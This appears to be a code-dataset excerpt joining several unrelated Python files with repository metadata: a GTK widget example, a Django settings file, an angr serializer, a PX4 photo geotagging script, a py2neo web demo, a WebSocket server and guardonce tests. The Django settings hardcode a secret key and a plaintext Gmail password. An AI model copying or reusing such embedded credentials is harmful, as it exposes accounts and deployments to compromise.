return self.lexer
def parse(self):
if self.parser:
plugin = self.parser(self.source_file, lexer=self.lexer)
dependencies = plugin.parse()
return list(filter(bool, set(dependencies)))
return []
| bsd-3-clause | -8,170,313,507,200,091,000 | 31.118519 | 107 | 0.561808 | false | 4.34034 | false | false | false |
virtuald/pygi-composite-templates | examples/from_file/mywidget.py | 2 | 1697 | #!/usr/bin/env python
from __future__ import print_function
# This is only required to make the example with without requiring installation
# - Most of the time, you shouldn't use this hack
import sys
from os.path import join, dirname
sys.path.insert(0, join(dirname(__file__), '..', '..'))
from gi.repository import Gtk
from gi_composites import GtkTemplate
@GtkTemplate(ui='mywidget.ui')
class MyWidget(Gtk.Box):
# Required else you would need to specify the full module
# name in mywidget.ui (__main__+MyWidget)
__gtype_name__ = 'MyWidget'
entry = GtkTemplate.Child()
# Alternative way to specify multiple widgets
#label1, entry = GtkTemplate.Child.widgets(2)
def __init__(self, text):
super(Gtk.Box, self).__init__()
# This must occur *after* you initialize your base
self.init_template()
self.entry.set_text(text)
@GtkTemplate.Callback
def button_clicked(self, widget, user_data):
# 'object' attribute (user-data in glade) is set
print("The button was clicked with entry text: %s" % self.entry.get_text())
print("The user-data is %s" % user_data)
@GtkTemplate.Callback
def entry_changed(self, widget):
# 'object' attribute (user-data in glade) is not set
print("The entry text changed: %s" % self.entry.get_text())
@GtkTemplate.Callback
def on_MyWidget_destroy(self, widget):
print("MyWidget destroyed")
if __name__ == '__main__':
win = Gtk.Window()
win.connect('delete-event', Gtk.main_quit)
widget = MyWidget("The entry text!")
win.add(widget)
win.show_all()
Gtk.main()
| lgpl-2.1 | -7,714,377,119,146,838,000 | 26.819672 | 83 | 0.63406 | false | 3.746137 | false | false | false |
javiligorria/ies-bolivar | JEM/settings.py | 1 | 5808 | # Django settings for JEM project.
import os.path
RUTA_PROYECTO = os.path.dirname(os.path.realpath(__file__))
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', '[email protected]'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'jemdb', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'es'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = os.path.join(RUTA_PROYECTO,'media')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/media/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT =''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
os.path.join(RUTA_PROYECTO,'static'),
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '1b-8=7hxf8!o+%+1y%*os2ytx3!*esoumr#i34vtdvjli2rnyr'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'JEM.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'JEM.wsgi.application'
TEMPLATE_DIRS = (
os.path.join(RUTA_PROYECTO,'templates'),
#'C:/Users/javiligorria/Desktop/JEM/JEM/templates',
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Uncomment the next line to enable the admin:
'django.contrib.admin',
'principal',
# Uncomment the next line to enable admin documentation:
'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
#Configuraciones para enviar mensajes usando gmail
EMAIL_USE_TLS =True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = '[email protected]'
EMAIL_HOST_PASSWORD = '28344308'
EMAIL_PORT = 587
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
| gpl-3.0 | -5,361,671,234,065,746,000 | 33.152941 | 108 | 0.68722 | false | 3.592822 | false | false | false |
angr/angr | angr/angrdb/serializers/loader.py | 1 | 2125 |
from io import BytesIO
from typing import List
import cle
from ...errors import AngrCorruptDBError
from ..models import DbObject
class LoaderSerializer:
"""
Serialize/unserialize a CLE Loader object into/from an angr DB.
"""
backend2name = dict((v, k) for k, v in cle.ALL_BACKENDS.items())
@staticmethod
def dump(session, loader):
for obj in loader.all_objects:
if isinstance(obj, (cle.ExternObject,
cle.backends.tls.elf_tls.ELFTLSObject,
cle.KernelObject,)):
# skip dynamically created objects
continue
# does the object exist?
exists = session.query(DbObject.id).filter_by(path=obj.binary).scalar() is not None
if exists:
# it exists. skip.
continue
# FIXME: We assume the binary and its libraries all still exist on the disk
# save the object
o = DbObject(
main_object=loader.main_object is obj,
path=obj.binary,
content=open(obj.binary, "rb").read(),
backend=LoaderSerializer.backend2name.get(obj.__class__),
backend_args="", # TODO: We will need support from CLE to store loader arguments
)
session.add(o)
@staticmethod
def load(session):
all_objects = { } # path to object
main_object = None
db_objects = session.query(DbObject) # type: List[DbObject]
for db_o in db_objects:
all_objects[db_o.path] = db_o
if db_o.main_object:
main_object = db_o
if main_object is None:
raise AngrCorruptDBError("Corrupt database: No main object.")
# build params
# FIXME: Load other objects
loader = cle.Loader(
BytesIO(main_object.content),
)
# fix the binary name of the main binary
loader._main_binary_path = main_object.path
loader.main_object.binary = main_object.path
return loader
| bsd-2-clause | 7,931,450,695,782,348,000 | 28.109589 | 97 | 0.562824 | false | 4.319106 | false | false | false |
mcgill-robotics/Firmware | Tools/sdlog2/geo_tag_images.py | 2 | 14291 | #!/usr/bin/env python
#
# Tag the images recorded during a flight with geo location extracted from
# a PX4 binary log file.
#
# This file accepts *.jpg format images and reads position information
# from a *.px4log file
#
# Example Syntax:
# python geo_tag_images.py --logfile=log001.px4log --input=images/ --output=imagesWithTag/ --offset=-0.4 -v
#
# Optional: Correct image times first
# jhead -exonly -ft -n%Y-%m-%d\ %H.%M.%S -ta+HH:MM:SS *.JPG
#
# Author: Hector Azpurua [email protected]
# Based on the script of Andreas Bircher
import os
import re
import sys
import bisect
import pyexiv2
import argparse
from lxml import etree
import datetime
import calendar
from shutil import copyfile
from subprocess import check_output
from pykml.factory import KML_ElementMaker as KML
from pykml.factory import GX_ElementMaker as GX
class GpsPosition(object):
def __init__(self, timestamp, lat, lon, alt):
self.timestamp = timestamp
self.lat = float(lat)
self.lon = float(lon)
self.alt = float(alt)
class Main:
def __init__(self):
"""
:param logfile:
:param input:
:param output:
:param offset:
:param verbose:
:return:
"""
args = self.get_arg()
self.logfile = args['logfile']
self.input = args['input']
self.output = args['output']
self.kml = args['kml']
self.verbose = args['verbose']
self.offset = args['offset']
self.time_thresh = args['threshold']
self.tdiff_list = []
self.non_processed_files = []
self.tagged_gps = []
print '[INFO] Loading logs and images locations...'
self.gps_list = self.load_gps_from_log(self.logfile, self.offset)
self.img_list = self.load_image_list(self.input)
if len(self.img_list) <= 0:
print '[ERROR] Cannot load JPG images from input folder, please check filename extensions.'
sys.exit(1)
if not os.path.exists(self.output):
os.makedirs(self.output)
if not self.output.endswith(os.path.sep):
self.output += os.path.sep
self.tag_images()
if self.kml and len(self.tdiff_list) > 0:
self.gen_kml()
if len(self.non_processed_files) > 0:
print '[WARNING] Some images werent processed (', len(self.non_processed_files), 'of', len(self.img_list), '):'
for elem in self.non_processed_files:
print '\t', elem
@staticmethod
def to_degree(value, loc):
"""
Convert a lat or lon value to degrees/minutes/seconds
:param value: the latitude or longitude value
:param loc: could be ["S", "N"] or ["W", "E"]
:return:
"""
if value < 0:
loc_value = loc[0]
elif value > 0:
loc_value = loc[1]
else:
loc_value = ""
absolute_value = abs(value)
deg = int(absolute_value)
t1 = (absolute_value - deg) * 60
minute = int(t1)
sec = round((t1 - minute) * 60, 5)
return deg, minute, sec, loc_value
@staticmethod
def gps_week_seconds_to_datetime(gpsweek, gpsmillis, leapmillis=0):
"""
Convert GPS week and seconds to datetime object, using leap milliseconds if necessary
:param gpsweek:
:param gpsmillis:
:param leapmillis:
:return:
"""
datetimeformat = "%Y-%m-%d %H:%M:%S.%f"
epoch = datetime.datetime.strptime(
"1980-01-06 00:00:00.000", datetimeformat)
elapsed = datetime.timedelta(
days=(gpsweek * 7), milliseconds=(gpsmillis + leapmillis))
return Main.utc_to_local(epoch + elapsed)
@staticmethod
def unix_microseconds_to_datetime(unix_us, offset=0):
"""
Convert unix microseconds to datetime object, using offset milliseconds if necessary
:param unix_us:
:param offset:
:return:
"""
# time in seconds
time_s = int(unix_us) / 1000000 + (offset / 1000)
datetime_from_unix = datetime.datetime.fromtimestamp(time_s)
return datetime_from_unix
@staticmethod
def utc_to_local(utc_dt):
"""
Convert UTC time in local time
:param utc_dt:
:return:
"""
# use integer timestamp to avoid precision loss
timestamp = calendar.timegm(utc_dt.timetuple())
local_dt = datetime.datetime.fromtimestamp(timestamp)
assert utc_dt.resolution >= datetime.timedelta(microseconds=1)
return local_dt.replace(microsecond=utc_dt.microsecond)
def gen_kml(self):
"""
Generate a KML file with keypoints on the locations of the pictures, including height
:return:
"""
style_dot = "sn_shaded_dot"
style_path = "red_path"
doc = KML.kml(
KML.Document(
KML.Name("GPS of the images"),
KML.Style(
KML.IconStyle(
KML.scale(0.4),
KML.Icon(
KML.href(
"http://maps.google.com/mapfiles/kml/shapes/shaded_dot.png")
),
),
id=style_dot,
),
KML.Style(
KML.LineStyle(
KML.color('7f0000ff'),
KML.width(6),
GX.labelVisibility('1'),
),
id=style_path
)
)
)
# create points
for i, gps in enumerate(self.tagged_gps):
ii = i + 1
doc.Document.append(
KML.Placemark(
KML.styleUrl('#{0}'.format(style_dot)),
KML.Point(
KML.extrude(True),
KML.altitudeMode('absolute'),
KML.coordinates(
"{},{},{}".format(gps.lon, gps.lat, gps.alt))
),
KML.name(
str(ii)) if ii % 5 == 0 or ii == 1 else KML.name()
)
)
# create the path
doc.Document.append(
KML.Placemark(
KML.styleUrl('#{0}'.format(style_path)),
KML.LineString(
KML.altitudeMode('absolute'),
KML.coordinates(
' '.join(["{},{},{}".format(gps.lon, gps.lat, gps.alt)
for gps in self.tagged_gps])
)
)
)
)
s = etree.tostring(doc)
file_path = self.output + 'GoogleEarth_points.kml'
f = open(file_path, 'w')
f.write(s)
f.close()
print '[INFO] KML file generated on:', file_path
def get_closest_datetime_index(self, datetime_list, elem):
"""
Get the closest element between a list of datetime objects and a date
:param datetime_list:
:param elem:
:return:
"""
dlist_len = len(datetime_list)
i = bisect.bisect_left(datetime_list, elem)
# Cleanup of the indices
if i < 0:
i = 0
elif i >= dlist_len:
i = dlist_len - 1
date = datetime_list[i]
diff = abs((date - elem).total_seconds())
if diff > self.time_thresh:
return -1, diff
return i, diff
def set_gps_location(self, file_name, lat, lng, alt):
"""
Add the GPS tag and altitude to a image file
:param file_name:
:param lat:
:param lng:
:param alt:
:return:
"""
lat_deg = self.to_degree(lat, ["S", "N"])
lng_deg = self.to_degree(lng, ["W", "E"])
exiv_lat = (pyexiv2.Rational(lat_deg[0] * 60 + lat_deg[1], 60),
pyexiv2.Rational(lat_deg[2] * 100, 6000), pyexiv2.Rational(0, 1))
exiv_lng = (pyexiv2.Rational(lng_deg[0] * 60 + lng_deg[1], 60),
pyexiv2.Rational(lng_deg[2] * 100, 6000), pyexiv2.Rational(0, 1))
try:
exiv_image = pyexiv2.ImageMetadata(file_name)
exiv_image.read()
exiv_image["Exif.GPSInfo.GPSLatitude"] = exiv_lat
exiv_image["Exif.GPSInfo.GPSLatitudeRef"] = lat_deg[3]
exiv_image["Exif.GPSInfo.GPSLongitude"] = exiv_lng
exiv_image["Exif.GPSInfo.GPSLongitudeRef"] = lng_deg[3]
exiv_image["Exif.GPSInfo.GPSAltitude"] = pyexiv2.Rational(alt, 1)
exiv_image["Exif.GPSInfo.GPSAltitudeRef"] = '0'
exiv_image["Exif.Image.GPSTag"] = 654
exiv_image["Exif.GPSInfo.GPSMapDatum"] = "WGS-84"
exiv_image["Exif.GPSInfo.GPSVersionID"] = '2 0 0 0'
exiv_image.write(True)
except Exception as e:
print '[ERROR]', e
def load_gps_from_log(self, log_file, offset):
"""
Load gps list from PX4 binary log
:param log_file:
:param offset:
:return:
"""
gps_list = []
out = check_output(
["python", "sdlog2_dump.py", log_file, "-m GPS", "-v"])
for line in out.splitlines():
if not line.startswith("MSG GPS:"):
continue
vdict = {}
pairs = re.split(r'[;,:]\s*', line)
for pair in pairs:
e = pair.split('=')
if len(e) == 2:
vdict[e[0]] = float(e[1])
# PX4 GPS.GPSTime is unix time in microseconds
gps_time = vdict['GPSTime']
gps_lat = vdict['Lat']
gps_lon = vdict['Lon']
gps_alt = vdict['Alt']
date = self.unix_microseconds_to_datetime(gps_time, offset)
gps_list.append(GpsPosition(date, gps_lat, gps_lon, gps_alt))
return gps_list
def get_image_creation_date(self, filename):
exiv_image = pyexiv2.ImageMetadata(filename)
exiv_image.read()
# Prefer DateTime/Original over the other values
if 'Exif.Photo.DateTimeOriginal' in exiv_image:
cdate = exiv_image['Exif.Photo.DateTimeOriginal'].value
return cdate
elif 'Exif.Image.DateTime' in exiv_image:
cdate = exiv_image['Exif.Image.DateTime'].value
return cdate
else:
epoch = os.path.getmtime(filename)
return datetime.datetime.fromtimestamp(epoch)
def load_image_list(self, input_folder, file_type='jpg'):
"""
Load image list from a folder given a file type
:param input_folder:
:param file_type:
:return:
"""
self.img_list = [input_folder + filename for filename in os.listdir(input_folder)
if re.search(r'\.' + file_type + '$', filename, re.IGNORECASE)]
self.img_list = sorted(self.img_list)
return self.img_list
def tag_images(self):
"""
Tag the image list using the GPS loaded from the LOG file
:return:
"""
tagged_gps = []
img_size = len(self.img_list)
print '[INFO] Number of images:', img_size
print '[INFO] Number of gps logs:', len(self.gps_list)
dt_list = [x.timestamp for x in self.gps_list]
img_seq = 1
for i in xrange(img_size):
cdate = self.get_image_creation_date(self.img_list[i])
gps_i, img_tdiff = self.get_closest_datetime_index(dt_list, cdate)
base_path, filename = os.path.split(self.img_list[i])
if gps_i == -1:
self.non_processed_files.append(filename)
continue
closest_gps = self.gps_list[gps_i]
self.tdiff_list.append(img_tdiff)
if self.verbose:
msg = "[DEBUG] %s/%s) %s\n\timg %s -> gps %s (%ss)\n\tlat:%s, lon:%s, alt:%s".ljust(60) %\
(i + 1, img_size, filename, cdate, closest_gps.timestamp,
img_tdiff, closest_gps.lat, closest_gps.lon, closest_gps.alt)
print msg
output_filename = self.output + str(img_seq) + '_' + filename
copyfile(self.img_list[i], output_filename)
self.set_gps_location(
output_filename, closest_gps.lat, closest_gps.lon, closest_gps.alt)
self.tagged_gps.append(closest_gps)
img_seq += 1
if len(self.tdiff_list) > 0:
print '[INFO] Mean diff in seconds:', sum(self.tdiff_list) / float(len(self.tdiff_list))
@staticmethod
def get_arg():
parser = argparse.ArgumentParser(
description='Geotag script to add GPS info to pictures from PX4 binary log files.'
'It uses synchronized time to allocate GPS positions.'
)
parser.add_argument(
'-l', '--logfile', help='PX4 log file containing recorded positions.', required=True
)
parser.add_argument(
'-i', '--input', help='Input folder containing untagged images.', required=True
)
parser.add_argument(
'-o', '--output', help='Output folder to contain tagged images.', required=True
)
parser.add_argument(
'-t', '--threshold', help='Time threshold between the GPS time and the local image time.',
default=1, required=False, type=float
)
parser.add_argument(
'-of', '--offset', help='Time offset in MILLISECONDS between the GPS time and the local time.',
default=0, required=False, type=float
)
parser.add_argument(
'-kml', '--kml', help='Save the in KML format the information of all tagged images.',
required=False, action='store_true'
)
parser.add_argument(
'-v', '--verbose', help='Prints lots of information.',
required=False, action='store_true'
)
args = vars(parser.parse_args())
return args
if __name__ == "__main__":
m = Main()
| bsd-3-clause | -4,232,421,145,934,824,400 | 31.928571 | 123 | 0.528235 | false | 3.792728 | false | false | false |
nigelsmall/py2neo | demo/moviegraph/server.py | 1 | 2334 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
from bottle import get, post, redirect, request, run, static_file, template, TEMPLATE_PATH
from calendar import month_name
from datetime import date
from os import getenv
from os.path import dirname, join as path_join
from py2neo import Graph, watch
from demo.moviegraph.model import Movie, Person, Comment
home = dirname(__file__)
static = path_join(home, "static")
TEMPLATE_PATH.insert(0, path_join(home, "views"))
# Set up a link to the local graph database.
graph = Graph(password=getenv("NEO4J_PASSWORD"))
watch("neo4j.bolt")
@get('/css/<filename:re:.*\.css>')
def get_css(filename):
return static_file(filename, root=static, mimetype="text/css")
@get('/images/<filename:re:.*\.png>')
def get_image(filename):
return static_file(filename, root=static, mimetype="image/png")
@get("/")
def get_index():
""" Index page.
"""
return template("index")
@get("/person/")
def get_person_list():
""" List of all people.
"""
return template("person_list", people=Person.select(graph).order_by("_.name"))
@get("/person/<name>")
def get_person(name):
""" Page with details for a specific person.
"""
person = Person.select(graph, name).first()
movies = [(movie.title, "Actor") for movie in person.acted_in] + \
[(movie.title, "Director") for movie in person.directed]
return template("person", person=person, movies=movies)
@get("/movie/")
def get_movie_list():
""" List of all movies.
"""
return template("movie_list", movies=Movie.select(graph).order_by("_.title"))
@get("/movie/<title>")
def get_movie(title):
""" Page with details for a specific movie.
"""
return template("movie", movie=Movie.select(graph, title).first())
@post("/movie/comment")
def post_movie_comment():
""" Capture comment and redirect to movie page.
"""
today = date.today()
comment_date = "%d %s %d" % (today.day, month_name[today.month], today.year)
comment = Comment(comment_date, request.forms["name"], request.forms["text"])
title = request.forms["title"]
movie = Movie.select(graph, title).first()
comment.subject.add(movie)
graph.create(comment)
redirect("/movie/%s" % title)
if __name__ == "__main__":
run(host="localhost", port=8080, reloader=True)
| apache-2.0 | -523,447,049,300,249,700 | 24.933333 | 90 | 0.655527 | false | 3.432353 | false | false | false |
GoogleChromeLabs/pywebsocket3 | mod_pywebsocket/websocket_server.py | 15 | 11491 | # Copyright 2020, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Standalone WebsocketServer
This file deals with the main module of standalone server. Although it is fine
to import this file directly to use WebSocketServer, it is strongly recommended
to use standalone.py, since it is intended to act as a skeleton of this module.
"""
from __future__ import absolute_import
from six.moves import BaseHTTPServer
from six.moves import socketserver
import logging
import re
import select
import socket
import ssl
import threading
import traceback
from mod_pywebsocket import dispatch
from mod_pywebsocket import util
from mod_pywebsocket.request_handler import WebSocketRequestHandler
def _alias_handlers(dispatcher, websock_handlers_map_file):
"""Set aliases specified in websock_handler_map_file in dispatcher.
Args:
dispatcher: dispatch.Dispatcher instance
websock_handler_map_file: alias map file
"""
with open(websock_handlers_map_file) as f:
for line in f:
if line[0] == '#' or line.isspace():
continue
m = re.match(r'(\S+)\s+(\S+)$', line)
if not m:
logging.warning('Wrong format in map file:' + line)
continue
try:
dispatcher.add_resource_path_alias(m.group(1), m.group(2))
except dispatch.DispatchException as e:
logging.error(str(e))
class WebSocketServer(socketserver.ThreadingMixIn, BaseHTTPServer.HTTPServer):
"""HTTPServer specialized for WebSocket."""
# Overrides SocketServer.ThreadingMixIn.daemon_threads
daemon_threads = True
# Overrides BaseHTTPServer.HTTPServer.allow_reuse_address
allow_reuse_address = True
def __init__(self, options):
"""Override SocketServer.TCPServer.__init__ to set SSL enabled
socket object to self.socket before server_bind and server_activate,
if necessary.
"""
# Share a Dispatcher among request handlers to save time for
# instantiation. Dispatcher can be shared because it is thread-safe.
options.dispatcher = dispatch.Dispatcher(
options.websock_handlers, options.scan_dir,
options.allow_handlers_outside_root_dir)
if options.websock_handlers_map_file:
_alias_handlers(options.dispatcher,
options.websock_handlers_map_file)
warnings = options.dispatcher.source_warnings()
if warnings:
for warning in warnings:
logging.warning('Warning in source loading: %s' % warning)
self._logger = util.get_class_logger(self)
self.request_queue_size = options.request_queue_size
self.__ws_is_shut_down = threading.Event()
self.__ws_serving = False
socketserver.BaseServer.__init__(self,
(options.server_host, options.port),
WebSocketRequestHandler)
# Expose the options object to allow handler objects access it. We name
# it with websocket_ prefix to avoid conflict.
self.websocket_server_options = options
self._create_sockets()
self.server_bind()
self.server_activate()
def _create_sockets(self):
self.server_name, self.server_port = self.server_address
self._sockets = []
if not self.server_name:
# On platforms that doesn't support IPv6, the first bind fails.
# On platforms that supports IPv6
# - If it binds both IPv4 and IPv6 on call with AF_INET6, the
# first bind succeeds and the second fails (we'll see 'Address
# already in use' error).
# - If it binds only IPv6 on call with AF_INET6, both call are
# expected to succeed to listen both protocol.
addrinfo_array = [(socket.AF_INET6, socket.SOCK_STREAM, '', '',
''),
(socket.AF_INET, socket.SOCK_STREAM, '', '', '')]
else:
addrinfo_array = socket.getaddrinfo(self.server_name,
self.server_port,
socket.AF_UNSPEC,
socket.SOCK_STREAM,
socket.IPPROTO_TCP)
for addrinfo in addrinfo_array:
self._logger.info('Create socket on: %r', addrinfo)
family, socktype, proto, canonname, sockaddr = addrinfo
try:
socket_ = socket.socket(family, socktype)
except Exception as e:
self._logger.info('Skip by failure: %r', e)
continue
server_options = self.websocket_server_options
if server_options.use_tls:
if server_options.tls_client_auth:
if server_options.tls_client_cert_optional:
client_cert_ = ssl.CERT_OPTIONAL
else:
client_cert_ = ssl.CERT_REQUIRED
else:
client_cert_ = ssl.CERT_NONE
socket_ = ssl.wrap_socket(
socket_,
keyfile=server_options.private_key,
certfile=server_options.certificate,
ca_certs=server_options.tls_client_ca,
cert_reqs=client_cert_)
self._sockets.append((socket_, addrinfo))
def server_bind(self):
"""Override SocketServer.TCPServer.server_bind to enable multiple
sockets bind.
"""
failed_sockets = []
for socketinfo in self._sockets:
socket_, addrinfo = socketinfo
self._logger.info('Bind on: %r', addrinfo)
if self.allow_reuse_address:
socket_.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
socket_.bind(self.server_address)
except Exception as e:
self._logger.info('Skip by failure: %r', e)
socket_.close()
failed_sockets.append(socketinfo)
if self.server_address[1] == 0:
# The operating system assigns the actual port number for port
# number 0. This case, the second and later sockets should use
# the same port number. Also self.server_port is rewritten
# because it is exported, and will be used by external code.
self.server_address = (self.server_name,
socket_.getsockname()[1])
self.server_port = self.server_address[1]
self._logger.info('Port %r is assigned', self.server_port)
for socketinfo in failed_sockets:
self._sockets.remove(socketinfo)
def server_activate(self):
"""Override SocketServer.TCPServer.server_activate to enable multiple
sockets listen.
"""
failed_sockets = []
for socketinfo in self._sockets:
socket_, addrinfo = socketinfo
self._logger.info('Listen on: %r', addrinfo)
try:
socket_.listen(self.request_queue_size)
except Exception as e:
self._logger.info('Skip by failure: %r', e)
socket_.close()
failed_sockets.append(socketinfo)
for socketinfo in failed_sockets:
self._sockets.remove(socketinfo)
if len(self._sockets) == 0:
self._logger.critical(
'No sockets activated. Use info log level to see the reason.')
def server_close(self):
"""Override SocketServer.TCPServer.server_close to enable multiple
sockets close.
"""
for socketinfo in self._sockets:
socket_, addrinfo = socketinfo
self._logger.info('Close on: %r', addrinfo)
socket_.close()
def fileno(self):
"""Override SocketServer.TCPServer.fileno."""
self._logger.critical('Not supported: fileno')
return self._sockets[0][0].fileno()
def handle_error(self, request, client_address):
"""Override SocketServer.handle_error."""
self._logger.error('Exception in processing request from: %r\n%s',
client_address, traceback.format_exc())
# Note: client_address is a tuple.
def get_request(self):
"""Override TCPServer.get_request."""
accepted_socket, client_address = self.socket.accept()
server_options = self.websocket_server_options
if server_options.use_tls:
# Print cipher in use. Handshake is done on accept.
self._logger.debug('Cipher: %s', accepted_socket.cipher())
self._logger.debug('Client cert: %r',
accepted_socket.getpeercert())
return accepted_socket, client_address
def serve_forever(self, poll_interval=0.5):
"""Override SocketServer.BaseServer.serve_forever."""
self.__ws_serving = True
self.__ws_is_shut_down.clear()
handle_request = self.handle_request
if hasattr(self, '_handle_request_noblock'):
handle_request = self._handle_request_noblock
else:
self._logger.warning('Fallback to blocking request handler')
try:
while self.__ws_serving:
r, w, e = select.select(
[socket_[0] for socket_ in self._sockets], [], [],
poll_interval)
for socket_ in r:
self.socket = socket_
handle_request()
self.socket = None
finally:
self.__ws_is_shut_down.set()
def shutdown(self):
"""Override SocketServer.BaseServer.shutdown."""
self.__ws_serving = False
self.__ws_is_shut_down.wait()
# vi:sts=4 sw=4 et
| bsd-3-clause | -6,413,652,060,124,584,000 | 39.319298 | 79 | 0.599861 | false | 4.576264 | false | false | false |
cgmb/guardonce | tests/test_pattern_compiler.py | 1 | 9953 | # -*- coding: utf-8 -*-
# Copyright (C) 2016-2017 Cordell Bloor
# Published under the MIT License
import os
from nose.tools import *
from guardonce.pattern_compiler import *
def windows_only(f):
"""Only execute on windows systems"""
f.__test__ = os.name == "nt"
return f
def unix_only(f):
"""Only execute on unix systems"""
f.__test__ = os.name == "posix"
return f
class Context:
pass
def test_name():
pattern = 'name'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filename = 'Match.h'
assert_equals(createGuard(ctx), 'Match_h')
def test_path():
pattern = 'path'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','Match.h')
assert_equals(createGuard(ctx), 'src_Match_h')
def test_path_no_arg_with_filter():
'''Bug #19'''
pattern = 'path | upper'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','Match.h')
assert_equals(createGuard(ctx), 'SRC_MATCH_H')
def test_path_arg():
pattern = 'path 1'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'widgets_Match_h')
def test_path_big_arg():
pattern = 'path 10'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'src_widgets_Match_h')
def test_path_zero_arg():
pattern = 'path 0'
createGuard = compile_pattern(pattern)
ctx = Context()
ctx.filepath = os.path.join('src','widgets','Match.h')
assert_equals(createGuard(ctx), 'Match_h')
